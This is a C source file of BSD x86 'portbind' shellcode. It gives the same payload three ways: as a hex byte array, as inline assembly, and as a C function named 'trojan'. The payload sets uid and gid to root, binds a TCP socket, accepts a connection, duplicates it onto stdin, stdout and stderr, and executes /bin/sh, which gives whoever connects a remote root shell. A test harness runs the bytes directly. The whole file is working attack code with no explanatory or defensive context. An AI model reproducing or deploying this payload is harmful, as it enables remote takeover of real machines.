bsd hack script Portbind 143

1. char shellcode[] =
2. "\x31\xC0"
3. "\x50"
4. "\x50"
5. "\xB0\x17"
6. "\xCD\x80"      // setuid
7. "\x31\xC0"
8. "\x50"
9. "\x50"
10. "\xB0\xB5"
11. "\xCD\x80"      // setgid
12. "\xEB\x60"
13. "\x5E"
14. "\x31\xC0"
15. "\x89\x46\x04"
16. "\x88\x46\x17"
17. "\x6A\x06"
18. "\x6A\x01"
19. "\x6A\x02"
20. "\xb0\x61"
21. "\x50"
22. "\xCD\x80"      // socket
23. "\x89\xc7"
24. "\x31\xc0"
25. "\x6a\x10"
26. "\x56"
27. "\x57"
28. "\xb0\x68"
29. "\x50"
30. "\xCD\x80"      // bind
31. "\x6A\x01"
32. "\x57"
33. "\xb0\x6A"
34. "\x50"
35. "\xCD\x80"      // listen
36. "\x50"
37. "\x50"
38. "\x57"
39. "\xB0\x1E"
40. "\x50"
41. "\xCD\x80"      //accept
42. "\x89\xc7"
43. "\x31\xDB"
44. "\x31\xc9"
45. "\xb1\x03"
46. "\x49"
47. "\x31\xc0"
48. "\xb0\x5A"
49. "\x51"
50. "\x57"
51. "\x50"
52. "\xcd\x80"      // dup2
53. "\x39\xd9"
54. "\x75\xf2"
55. "\x31\xc0"
56. "\x89\x76\x18"
57. "\x89\x46\x1c"
58. "\x8D\x56\x1c"
59. "\x8D\x4E\x18"
60. "\x83\xc6\x10"
61. "\x52"
62. "\x51"
63. "\x56"
64. "\xb0\x3b"
65. "\x50"
66. "\xcd\x80"      // execve
67. "\xe8\x9b\xff\xff\xff"
68. "\xc0\x02\x7a\x69\x90\x90\x90\x90\xc0\xd5\xbf\xef\xb8\xd5\xbf\xef"
69. "/bin/sh";
70.  
71.  
72.  
73.  
74.  
75.  
76. /*
77. ** ASM shellcode
78. */
79. fct()
80. {
81.   __asm__("
82.  
83.  
84. xorl  %eax, %eax
85. pushl %eax
86. pushl %eax
87. movb  $0x17, %al
88. int   $0x80
89.  
90. xorl  %eax, %eax
91. pushl %eax
92. pushl %eax
93. movb  $0xB5, %al
94. int   $0x80
95.  
96.  
97.  
98. jmp  data
99. code:
100. popl  %esi
101. xorl  %eax, %eax
102. movl  %eax, 0x04(%esi)
103. movb  %al , 0x17(%esi)
104.  
105. pushl $0x06
106. pushl $0x01
107. pushl $0x02
108. movb  $0x61, %al
109. pushl %eax
110. int   $0x80
111.  
112. movl  %eax, %edi
113. xorl  %eax, %eax
114. pushl $0x10
115. pushl %esi
116. pushl %edi
117. movb  $0x68, %al
118. pushl %eax
119. int   $0x80
120.  
121. pushl $0x01
122. pushl %edi
123. movb  $0x6A, %al
124. pushl %eax
125. int   $0x80
126.  
127. pushl %eax
128. pushl %eax
129. pushl %edi
130. movb  $0x1E, %al
131. pushl %eax
132. int   $0x80
133.  
134. movl  %eax, %edi
135. xorl  %ebx, %ebx
136. xorl  %ecx, %ecx
137. movb  $0x03, %ecx
138. loop:
139. decl  %ecx
140. xorl  %eax, %eax
141. movb  $0x5A, %al
142. pushl %ecx
143. pushl %edi
144. pushl %eax
145. int   $0x80
146. cmpl  %ebx, %ecx
147. jne   loop
148.  
149. xorl  %eax, %eax
150. movl  %esi, 0x18(%esi)
151. movl  %eax, 0x1C(%esi)
152. leal  0x1C(%esi), %edx
153. leal  0x18(%esi), %ecx
154. addl  $0x10, %esi
155. pushl %edx
156. pushl %ecx
157. pushl %esi
158. movb  $0x3B, %al
159. pushl %eax
160. int   $0x80
161.  
162. data:
163. call  code
164. .string \"\xC0\x02\x7A\x69\x90\x90\x90\x90\xC0\xD5\xBF\xEF\xB8\xD5\xBF\xEF\"
165. .string \"/bin/sh\x90\"
166. ");
167. }
168.  
169.  
170.  
171.  
172. /*
173. ** Test
174. */
175. main()
176. {
177.   void  (*fct)();
178.    
179.   printf("shellcode lenght = %d bytes \n", sizeof(shellcode));
180.   fct = (void *) shellcode;
181.   fct();
182. }
183.  
184.  
185.  
186.  
187.  
188. /*
189. ** C shellcode
190. */
191. trojan()
192. {
193.   int                   clientsock;
194.   int                   serversock;
195.   char                  *server;
196.   char                  *args[2];
197.    
198.   server = "\xC0\x02\x7A\x69\x00\x00\x00\x00\xC0\xD5\xBF\xEF\xB8\xD5\xBF\xEF";
199.   args[0] = "/bin/sh";
200.   args[1] = 0x00;
201.   setuid(0);
202.   setgid(0);
203.   serversock = socket(0x02, 0x01, 0x06);
204.   bind(serversock, server, 0x10);
205.   listen(serversock, 0x01);
206.   clientsock = accept(serversock, 0x00, 0x00);
207.   dup2(clientsock, 0x02);
208.   dup2(clientsock, 0x01);
209.   dup2(clientsock, 0x00);
210.   execve(args[0], args, args[1]);
211. }